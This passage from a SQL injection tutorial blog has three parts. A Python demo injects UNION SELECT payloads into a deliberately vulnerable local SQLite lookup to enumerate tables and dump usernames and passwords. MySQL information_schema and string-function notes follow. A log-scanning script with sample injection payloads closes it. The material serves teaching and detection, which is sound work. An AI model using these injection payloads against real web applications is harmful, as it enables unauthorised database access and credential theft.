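    cols = [f"({expression})"] + ["null"] * (ncols - 1)
    rows = vulnerable_lookup(conn, "-1 UNION ALL SELECT " + ",".join(cols))
    return rows[0][0]


def enumerate_and_dump(conn: sqlite3.Connection) -> dict:
    """Catalogue -> table names -> column names -> data, as in steps 2 to 4."""
    n = probe_column_count(conn)
    # MySQL equivalent: SELECT group_concat(table_name) FROM information_schema.tables
    #                   WHERE table_schema=database()
    tables = extract(conn, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'", n)
    # MySQL equivalent: SELECT group_concat(column_name) FROM information_schema.columns
    #                   WHERE table_name='user'
    columns = extract(conn, "SELECT group_concat(name) FROM pragma_table_info('user')", n)
    # MySQL equivalent: group_concat(username,0x3a,password); SQLite concatenates with ||
    creds = extract(conn, "SELECT group_concat(username || ':' || password) FROM user", n)
    return {"columns_in_union": n, "tables": tables, "columns": columns, "creds": creds}


if __name__ == "__main__":
    db = build_db()
    print(enumerate_and_dump(db))
    # The same payload through the parameterised query matches nothing at all:
    print(safe_lookup(db, "-1 UNION ALL SELECT null,null,null,null,null"))
```

The probe loop is the automated form of the manual "add one <code>null</code> and retry" step; against MySQL the exception to catch is the driver's error for "The used SELECT statements have a different number of columns". Note that <code>safe_lookup</code> returns an empty list for the injected string because the whole string is compared to <code>id</code> as a value, which is the entire point of parameterised queries.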
<h2 id="mysql-前置知识">mysql 前置知识</h2>
<h3 id="information_schema-数据库">information_schema 数据库</h3>
<blockquote>
<p><code>information_schema</code>数据库 是mysql 5.0 以上版本自带的一个数据库，这数据库存储着整个数据库名，数据库中的表名，表中的列名，数据类型，访问权限等。相当于整个数据库的目录</p>
</blockquote>
<p><strong>information_schema 中重点关注的有三张表：</strong></p>
<ul>
<li>
<h3 id="schemata-schemata-表中提供了当前数据中所有数据库的信息"><code>schemata</code>: the SCHEMATA table provides information about every <strong>database</strong> on the current server;</h3>
<ul>
<li>
<h4 id="schema_name-schema_name-字段名保存所有数据库名"><code>schema_name</code>: the SCHEMA_NAME column holds every <strong>database name</strong>;</h4>
</li>
</ul>
</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- list all database names (the unqualified second form only works while information_schema is the current database)
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">schema_name</span> <span style="color:#000;font-weight:bold">from</span> information_schema.schemata;
<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">schema_name</span> <span style="color:#000;font-weight:bold">from</span> schemata;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121110253739.png">
            <img class="mx-auto" alt="image-20210121110253739" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121110253739.png" />
        </a>
    </p>
<ul>
<li>
<h3 id="tablestables-表-提供了数据库中表的信息"><code>tables</code>: the TABLES table provides information about the <strong>tables</strong> in each database</h3>
<ul>
<li>
<h4 id="table_name-table_name-字段保存该表中所有表名"><code>table_name</code>: the TABLE_NAME column holds every <strong>table name</strong></h4>
</li>
<li>
<h4 id="table_schema-table_schema-字段保存数据库名可以作为查询条件"><code>table_schema</code>: the TABLE_SCHEMA column holds the <strong>database name, which can be used as a filter condition</strong></h4>
</li>
</ul>
</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- list every table together with the database it belongs to (unqualified name: run while information_schema is the current database)
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">table_name</span>,table_schema <span style="color:#000;font-weight:bold">from</span> tables ;

<span style="color:#998;font-style:italic">-- list the table names of one specific database
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">table_name</span> , table_schema <span style="color:#000;font-weight:bold">from</span> information_schema.tables <span style="color:#000;font-weight:bold">where</span> table_schema <span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121113048927.png">
            <img class="mx-auto" alt="image-20210121113048927" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121113048927.png" />
        </a>
    </p>
<ul>
<li>
<h3 id="columns-columns-表-提供了表中列的信息信息"><code>columns</code>: the COLUMNS table provides information about the <strong>columns</strong> of each table</h3>
<ul>
<li>
<h4 id="column_name----column_name-字段保存所有表中字段名"><code>column_name</code>: the COLUMN_NAME column holds the <strong>column names</strong> of every table</h4>
</li>
<li>
<p><em><code>table_name</code>: the TABLE_NAME join column holds the <strong>table name</strong> each column belongs to</em></p>
</li>
<li>
<p><em><code>table_schema</code>: the TABLE_SCHEMA join column holds the <strong>database name, which can be used as a filter condition</strong></em></p>
</li>
</ul>
</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- list the column names of every table in every database (run while information_schema is the current database)
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">column_name</span>, <span style="color:#000;font-weight:bold">table_name</span>, table_schema <span style="color:#000;font-weight:bold">from</span> columns;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121115330916.png">
            <img class="mx-auto" alt="image-20210121115330916" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121115330916.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- list the column names of one table in one specific database
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">column_name</span>, <span style="color:#000;font-weight:bold">table_name</span>, table_schema <span style="color:#000;font-weight:bold">from</span> columns <span style="color:#000;font-weight:bold">where</span> <span style="color:#000;font-weight:bold">table_name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;user&#39;</span> <span style="color:#000;font-weight:bold">and</span> table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span>;
</code></pre></td></tr></table>
</div>
</div><h3 id="mysql-常用内置函数">Commonly used MySQL built-in functions</h3>
<h4 id="字符串函数">String functions</h4>
<ul>
<li>
<p><code>concat(str1,str2,str3..)</code>: joins the given strings into one new string</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">select</span> concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121162845786.png">
            <img class="mx-auto" alt="image-20210121162845786" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121162845786.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>group_concat(str1,str2 separator 'delimiter')</code>: aggregate function that joins the values of a group of rows into one string; <a href="https://blog.csdn.net/u012620150/article/details/81945004">details</a></p>
</li>
<li>
<p><code>length(str)</code>: returns the length of the string str (measured in bytes; <code>char_length()</code> counts characters, which matters for multi-byte text)</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">length</span>( concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>));
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163004683.png">
            <img class="mx-auto" alt="image-20210121163004683" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163004683.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>left(str,n)</code>: takes the leftmost n characters of the string</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">left</span>(concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>),<span style="color:#099">4</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163141457.png">
            <img class="mx-auto" alt="image-20210121163141457" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163141457.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>right(str,n)</code>: takes the rightmost n characters of the string (positions start at 1)</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">right</span>(concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>),<span style="color:#099">4</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163352257.png">
            <img class="mx-auto" alt="image-20210121163352257" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163352257.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>substr(str,m,n)</code>: starts at position m of the string and takes the next n characters (positions start at 1)</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> substr(<span style="color:#d14">&#39;abcdef&#39;</span>,<span style="color:#099">3</span>,<span style="color:#099">2</span>);
</code></pre></td></tr></table>
</div>
</div></li>
</ul>
</li>
<li>
<p><code>substring(str,m,n)</code>: synonym for <code>substr</code></p>
</li>
<li>
<p><code>mid(str,m,n)</code>: synonym for <code>substr</code></p>
</li>
<li>
<p><code>ltrim(str)</code> removes leading spaces, <code>rtrim(str)</code> removes trailing spaces, <code>trim(str)</code> removes spaces on both sides</p>
</li>
</ul>
<h4 id="数学函数">Math functions</h4>
<ul>
<li>
<p><code>round(n,d)</code>: rounds to d decimal places (n is the number, d the number of decimal places to keep)</p>
</li>
<li>
<p><code>rand()</code>: returns a random number between 0 and 1</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> round(rand(),<span style="color:#099">2</span>);
<span style="color:#998;font-style:italic">-- pick one random row from the table
</span><span style="color:#998;font-style:italic"></span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> rand() <span style="color:#000;font-weight:bold">limit</span> <span style="color:#099">1</span>; 
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121165952312.png">
            <img class="mx-auto" alt="image-20210121165952312" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121165952312.png" />
        </a>
    </p>
</li>
</ul>
</li>
</ul>
<h4 id="日期函数">Date functions</h4>
<ul>
<li><code>now()</code>: returns the current system date and time</li>
<li><code>current_time()</code>: returns the current system time</li>
<li><code>current_date()</code>: returns the current system date</li>
</ul>
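<p>The information_schema tables and the string functions above are the primitives that a union-based payload such as the test.php request at the top of this section is assembled from, which also makes them useful detection indicators. The following Python script is an added example, not code from the original post: it decodes request targets from constructed access-log lines and flags parameters that combine these primitives; the indicator names, the two-indicator threshold and the log lines are assumptions of this example.</p>

```python
"""Flag request parameters built from the MySQL primitives discussed above.

Constructed example for illustration; not code from the original post.
Indicator names, thresholds and the access-log lines are assumptions.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Each indicator is a regex run over the decoded, lower-cased parameter value.
# The labels are this example's own naming, not a standard taxonomy.
INDICATORS = {
    # schema enumeration via the three information_schema tables listed above
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    # UNION SELECT with null padding, as in the test.php payload at the top of this section
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    # aggregation of many rows into a single result cell
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    # character-by-character slicing functions
    "string_slicing": re.compile(r"\b(?:substr|substring|mid|left|right)\s*\("),
    # length probing; weak on its own, since sorting by length(...) is legitimate
    "length_probe": re.compile(r"\blength\s*\("),
}

# Only the request line of a combined-format log entry matters here.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_params(target):
    """Split a request target into {name: value}; parse_qsl turns '+' and %xx back into characters."""
    query = urlsplit(target).query
    return dict(parse_qsl(query, keep_blank_values=True))


def normalise(value):
    """Lower-case and collapse whitespace so the regexes see one canonical form."""
    return re.sub(r"\s+", " ", value).lower()


def classify_request(target):
    """Return {param: [indicator labels]} for every parameter that matched at least one indicator."""
    hits = {}
    for name, raw in decode_params(target).items():
        value = normalise(raw)
        labels = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if labels:
            hits[name] = labels
    return hits


def is_suspicious(hits):
    """Schema enumeration or UNION SELECT is decisive; weaker indicators need two in one parameter."""
    decisive = {"information_schema", "union_select"}
    for labels in hits.values():
        if decisive & set(labels) or len(labels) >= 2:
            return True
    return False


def scan_log(lines):
    """Return (line number, request target, hits) for every suspicious request line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        hits = classify_request(match.group("target"))
        if is_suspicious(hits):
            findings.append((number, match.group("target"), hits))
    return findings


# Constructed access-log lines: line 2 is the payload shown at the top of this
# section, line 3 combines the substr() and information_schema primitives, and
# line 4 is a legitimate sort parameter that must not be flagged.
SAMPLE_LOG = [
    '127.0.0.1 - - [21/Jan/2021:15:54:24 +0800] "GET /mysql/test.php?name=1 HTTP/1.1" 200 312',
    '127.0.0.1 - - [21/Jan/2021:15:54:31 +0800] "GET /mysql/test.php?name=1+union+all+select+'
    '(select+group_concat(username,password)+from+user),null,null,null,null HTTP/1.1" 200 512',
    '127.0.0.1 - - [21/Jan/2021:15:55:02 +0800] "GET /mysql/test.php?name=1+union+select+'
    'substr(schema_name,1,4),null,null,null,null+from+information_schema.schemata HTTP/1.1" 200 480',
    '10.0.0.7 - - [21/Jan/2021:15:56:10 +0800] "GET /api/items?sort=length(title) HTTP/1.1" 200 2048',
    '10.0.0.7 - - [21/Jan/2021:15:56:11 +0800] "POST /login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for number, target, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {target}")
        for param, labels in hits.items():
            print(f"  {param}: {', '.join(labels)}")
```

Running the script reports lines 2 and 3 only; line 4 carries a single weak indicator and stays below the threshold.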

        </div>

        


        



        <div class="post-meta meta-tags">
            
            <ul class="clearfix">
                
                <li><a href='/tags/sql'>sql</a></li>
                
                <li><a href='/tags/mysql'>mysql</a></li>
                
<li><a href='/tags/%E6%BC%8F%E6%B4%9E'>vulnerability</a></li>
                
            </ul>
            
        </div>
    </article>
    
    

    
    
</div>

                    <footer id="footer">
    <div>
        &copy; 2021 <a href="https://gitmatrix.gitee.io/">matrix By matrix</a>
        
    </div>
</footer>


    

                </div>

            </div>
        </div>
    </div>
</body>

</html>